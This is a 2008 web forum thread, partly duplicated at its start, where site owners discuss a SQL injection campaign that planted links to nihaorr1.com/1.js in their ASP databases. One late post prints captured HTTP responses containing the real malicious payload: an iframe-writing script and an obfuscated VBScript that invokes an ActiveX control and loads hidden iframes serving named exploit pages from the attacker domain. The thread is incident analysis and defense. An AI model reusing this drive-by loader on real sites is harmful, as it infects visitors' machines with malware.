The db that supports our companies ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing? How are you resolving? We just happened to see this data...are there other adverse affects to resources
other than data?
Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?
That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China
What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over http so it wil be the devs fault for having sloppy code.
We have been hit by this as well. Lucky backup ran last night just prior to the attack.
Our initial investigations are pointing at an attack through IIS using ASP in an overload.
whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com
I used the safety of a VM to look under the hood at the operations of the 1.js file.
It writes several iframes to that seem to come up as page not found (Chinese language pack)
A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages. Anyone have any insight on that?
I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwritten that script into all of your products. Luckily a database restore fixed the problem. Two days later the same thing happened, I have changed all the database
and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing but this time as the pages are loaded ActivX is activated and wants to run but of course I did not allow it. Anybody has successfully solved this situation?
We were hit as well last week by a similar one. aspder
Now, last night we were hit by the nihaorr1 attack. Last nights was a little more sophisticated. It inserted script logic into various fields in the database. We ran sql queries to clean it out since no data was removed.
It appears to be a SQL Injector. But, we have not found the exact fix for our asp scripts to stop it. I managed to find entries in our log files to show the time. Interesting part is that it came from a local connection. This appears to be a virus that
hijacks a computer to do it's dirty work, since the source is not from China.
Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called infostealer , but we aren't sure if the PC caught it from the webserver,
or vice-versa. Thanks Barry
Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.
Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code. These sites are then carrying javascript code that launches Remote Data Services Control
ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!! (You can get WFetch for free in the IIS6.0 Resource Kit.)
kckriegs
11 Posts
Anyone know about www.nihaorr1.com/1.js?
Apr 17, 2008 09:35 PM|LINK
The db that supports our companies ecommerce is filling up with this url. We seem to be victims of a sql injection attack. Is anyone else experiencing? How are you resolving? We just happened to see this data...are there other adverse affects to resources other than data?
Any shared experience would be helpful!
Rovastar
3321 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 09:19 AM|LINK
Not noticed anything.
Looks dodgy though. I presume you have only just started getting these. Only from 11 Apr?
That is when the domain nihaorr1.com was registered. IP geolocation shows this machine in Beijing, China
What page are they hammering? What do the IIS logs say? Then look at that page. Nearly all hacks now are over http so it wil be the devs fault for having sloppy code.
Rovastar
3321 Posts
MVP
Moderator
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 09:34 AM|LINK
Yeah it is a script bot that spreads virus seems to be very wild atm.
Googling nihaorr1.com there are many references to it on sites http://www.google.co.uk/search?hl=en&q=nihaorr1.com&btnG=Search&meta= (11,000 references at the time)
Even when I clicked on a link and the virus checker popped up warning me of a virus there. I'll not try again.
It just seems to affect asp pages at the moment.
There was a few recent vulenerabilities with asp and IIS over the last 6 months like
http://www.microsoft.com/technet/security/Bulletin/MS08-006.mspx
I expect it is explioting one of those.
Take care.
onionlips
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 02:25 PM|LINK
We have been hit by this as well. Lucky backup ran last night just prior to the attack.
Our initial investigations are pointing at an attack through IIS using ASP in an overload.
whois lookup showing nihaorr1 registered via Chinese registrar xinnet.com
I used the safety of a VM to look under the hood at the operations of the 1.js file.
It writes several iframes to that seem to come up as page not found (Chinese language pack)
A look at the script is bit confusing and garbled (of course) but consistent reference is made to "cuteqq" as a variable and variable prefix. It creates an executable I have yet to determine its intent or impact.
Googling "cuteqq" pulls up all sorts of harmful flagged pages. Anyone have any insight on that?
autodynamic1
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 05:16 PM|LINK
I also have been hit by this attack on Saturday 4/12/08. It compromised our database and overwritten that script into all of your products. Luckily a database restore fixed the problem. Two days later the same thing happened, I have changed all the database and login passwords and did another db restore. Now today 4/18/08 we got hit again by the same thing but this time as the pages are loaded ActivX is activated and wants to run but of course I did not allow it. Anybody has successfully solved this situation?
nihaorr1 xss sql injection
rwmorey
4 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 06:17 PM|LINK
Hi --
We have been hit with this virus/injection as well. We are running Windows 2003 and I believe I have all the security patches on our system.
Does anyone have any idea how to prevent this from re-happening?
Rich
eftennis
4 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 07:17 PM|LINK
We were hit as well last week by a similar one. aspder
Now, last night we were hit by the nihaorr1 attack. Last nights was a little more sophisticated. It inserted script logic into various fields in the database. We ran sql queries to clean it out since no data was removed.
It appears to be a SQL Injector. But, we have not found the exact fix for our asp scripts to stop it. I managed to find entries in our log files to show the time. Interesting part is that it came from a local connection. This appears to be a virus that hijacks a computer to do it's dirty work, since the source is not from China.
bcondrey
1 Post
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 07:57 PM|LINK
Can you let me know what you searched for specifically in your logs? What was the internal PC infected with, did you get a virus name? We had a PC that was infected by a virus called infostealer , but we aren't sure if the PC caught it from the webserver, or vice-versa. Thanks Barry
davcox
267 Posts
Microsoft
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 18, 2008 11:57 PM|LINK
Yikes, pretty dangerous, a good time to scan your content for this URL and notify the website owners so they can fix their websites, applications and then fix the form validation logic.
Looks like someone is doing a lot of script code injection into a lot of vulnerable (read: poorly written) forms that aren't validating input to strip out script code. These sites are then carrying javascript code that launches Remote Data Services Control ActiveX control ... to exploit a few known vulnerabilities ... use WFetch to debug this!!! (You can get WFetch for free in the IIS6.0 Resource Kit.)
For example, here is how I looked at this:
GET http://www.nihaorr1.com:80/1.js HTTP/1.1\r\n
Host: www.nihaorr1.com\r\n
Accept: */*\r\n
\r\n
HTTP/1.1 200 OK\r\n
Connection: Keep-Alive\r\n
Content-Length: 110\r\n
Via: 1.1 RED-PRXY-29\r\n
Date: Fri, 18 Apr 2008 23:53:38 GMT\r\n
Content-Type: application/x-javascript\r\n
ETag: "30e1873949a1c81:237"\r\n
Server: Microsoft-IIS/6.0\r\n
Last-Modified: Fri, 18 Apr 2008 11:42:04 GMT\r\n
Accept-Ranges: bytes\r\n
\r\n
document.writeln("<iframe width=\'10\' height=\'1\' src=\'http:\/\/www.nihaorr1.com\/1.htm\'><\/iframe>");\r\n
\r\n
Then I made a second request to the iframe it tries to create:
GET http://www.nihaorr1.com:80/1.htm HTTP/1.1\r\n
Host: www.nihaorr1.com\r\n
Accept: */*\r\n
\r\n
HTTP/1.1 200 OK\r\n
Connection: Keep-Alive\r\n
Content-Length: 1160\r\n
Date: Fri, 18 Apr 2008 23:53:51 GMT\r\n
Content-Type: text/html\r\n
ETag: "fc6b5a164da1c81:237"\r\n
Server: Microsoft-IIS/6.0\r\n
Last-Modified: Fri, 18 Apr 2008 12:09:43 GMT\r\n
Accept-Ranges: bytes\r\n
\r\n
<script language=VBScript>\r\n
on error resume next\r\n
Set downf = document.createElement("object")\r\n
downf.setAttribute "classid", "clsid:BD9"&"6C556-6"&"5A3-11D"&"0-983A-00C"&"04FC2"&"9E36"\r\n
str="Microsoft.XMLHTTP"\r\n
Set O = downf.CreateObject(str,"")\r\n
if Not Err.Number = 0 then\r\n
err.clear\r\n
document.write("<iframe width=""10"" height=""10"" src=""http://www.nihaorr1.com/Real.gif""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Yahoo.php""></iframe>")\r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/cuteqq.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07055.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07033.htm""></iframe>") \r\n
document.write("<iframe width=""5"" height=""5"" src=""http://www.nihaorr1.com/Ms07004.htm""></iframe>")\r\n
else\r\n
document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ajax.htm""></iframe>")\r\n
document.write("<iframe width=""0"" height=""0"" src=""http://www.nihaorr1.com/Ms06014.htm""></iframe>")\r\n
end if\r\n
</script>\r\n
asidana
20 Posts
Re: Anyone know about www.nihaorr1.com/1.js?
Apr 19, 2008 01:36 PM|LINK
i've been using below regex
and got hit, couln't find anything in my serverlog about how its done